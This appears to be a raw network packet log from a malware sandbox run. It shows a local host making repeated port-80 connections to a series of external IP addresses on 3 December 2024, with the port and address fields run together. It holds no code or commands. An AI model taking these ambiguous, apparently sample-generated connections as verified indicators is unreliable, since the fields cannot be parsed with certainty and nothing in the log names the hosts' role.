                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.377680063 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.564188957 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.522651911 CET4976480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.734529972 CET804976484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.734849930 CET4976480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.737869024 CET4976480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.949829102 CET804976484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.949877977 CET804976484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.257364035 CET4976580192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.468962908 CET804976584.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.469284058 CET4976580192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.472388983 CET4976580192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.684361935 CET804976584.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.684674025 CET804976584.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:03.991090059 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.203025103 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.203346968 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.206541061 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.206655025 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.418586016 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.418874979 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.418885946 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.724855900 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.936619043 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.936839104 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.938968897 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.150911093 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.150970936 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151252031 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151307106 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151351929 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151395082 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151437998 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151479959 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151530027 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151639938 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151639938 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151798964 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.152437925 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.364064932 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.280976057 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.450253963 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.450448990 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.453989029 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.623059988 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.631900072 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.631951094 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.632133961 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:13.957010984 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:14.973061085 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.140580893 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.140841961 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.144032955 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.311431885 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316479921 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316529036 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316663980 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:16.659626007 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.675656080 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.843516111 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.843836069 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.846971035 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.847080946 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.030801058 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.030847073 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.030875921 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035595894 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035640955 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035832882 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:19.362112045 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.378186941 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.547779083 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.547981024 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.550163984 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.719173908 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.724860907 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.724932909 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.725213051 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.725799084 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.894625902 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:25.977830887 CET4977280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.115695953 CET8049772208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.115915060 CET4977280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.119172096 CET4977280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.256906033 CET8049772208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.641840935 CET4977380192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.779418945 CET8049773208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.779562950 CET4977380192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.782742023 CET4977380192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.920288086 CET8049773208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006691933 CET80497818.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006807089 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:00.196705103 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.212865114 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.553941965 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.554177046 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557466030 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557502031 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557573080 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898515940 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898544073 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898566008 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898837090 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898861885 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898880005 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.899070024 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:03.071142912 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.087148905 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.464951038 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.465176105 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.467344999 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844850063 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844867945 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844880104 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.845268011 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.845868111 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:05.223275900 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.969978094 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.289215088 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.289499044 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.293055058 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612169027 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612310886 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612395048 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612514019 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:11.803602934 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:12.819644928 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.138928890 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.139122009 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.142272949 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461798906 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461844921 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461878061 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.462095976 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:14.646752119 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.662822008 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.981611967 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.981825113 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.985086918 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.985142946 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304090977 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304142952 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304173946 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304487944 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304717064 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304961920 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.305207014 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:17.489775896 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.505901098 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.825035095 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.825238943 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.827400923 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.146469116 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.146908045 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.147025108 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.147305012 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.147897959 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.466891050 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.338773012 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.506644964 CET8049788103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.506814957 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.509988070 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700347900 CET8049788103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700395107 CET8049788103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700544119 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:26.019232988 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.035233974 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.203289986 CET8049789103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.203465939 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.206959963 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401585102 CET8049789103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401593924 CET8049789103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401782036 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:28.723515987 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.737821102 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.905785084 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.905966997 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909235001 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909264088 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909336090 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.084804058 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117734909 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117752075 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117901087 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:31.424282074 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.440285921 CET4979180192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495189905 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495223045 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495496035 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495511055 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:20.914105892 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.027818918 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.028052092 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.030231953 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.140487909 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.141648054 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.141664028 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.142002106 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.142600060 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.252326012 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.295648098 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.420061111 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.420244932 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.423396111 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.547655106 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872312069 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872333050 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872349977 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872364044 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872391939 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872394085 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872406960 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872423887 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872438908 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872453928 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872473001 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872560024 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872694016 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997052908 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997078896 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997267962 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997330904 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997355938 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997375011 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997391939 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997416973 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997509956 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997596025 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:27.934722900 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:28.943514109 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.068149090 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.068356037 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.071538925 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.195846081 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582056046 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582078934 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582094908 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582109928 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582124949 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582139969 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582151890 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582168102 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582362890 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582362890 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582362890 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582367897 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582389116 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582530022 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706891060 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706913948 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706928968 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706943989 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707015038 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707185030 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707214117 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707232952 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707247972 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707528114 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:30.583111048 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.599364996 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.723675013 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.723896980 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727149010 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727176905 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727252007 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.851893902 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.851913929 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164474964 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164496899 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164513111 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164534092 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164556980 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164572954 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164731026 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164779902 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164798975 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164799929 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164815903 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164830923 CET8049806192.185.147.100192.168.11.20
